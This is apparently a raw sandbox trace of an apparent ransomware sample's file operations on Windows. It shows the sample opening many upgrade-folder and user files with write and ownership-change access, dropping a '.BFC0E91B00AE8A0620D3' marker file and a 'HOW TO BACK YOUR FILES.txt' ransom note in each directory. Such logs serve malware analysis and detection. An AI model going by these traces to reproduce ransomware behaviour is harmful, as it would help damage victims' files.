Create C:\Windows10Upgrade\2052\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Windows10Upgrade\2052\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\2052\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\i386\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\block.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bluelogo.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\bullet.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_eos.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\default_oobe.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\eula.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStarted.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\loading.gif desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\lock.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\logo.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\marketing.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\pass.png desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwcompat.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\hwexclude.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.cat desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\nxquery.inf desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\dll2\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Windows10Upgrade\dll1\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\.BFC0E91B00AE8A0620D3 desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\FD1HVy\Desktop\ids.txt desired_access = FILE_READ_DATA, FILE_WRITE_DATA, READ_CONTROL, WRITE_DAC, WRITE_OWNER, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH, share_mode = FILE_SHARE_READ True 23
Fn
Create C:\Users\HOW TO BACK YOUR FILES.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
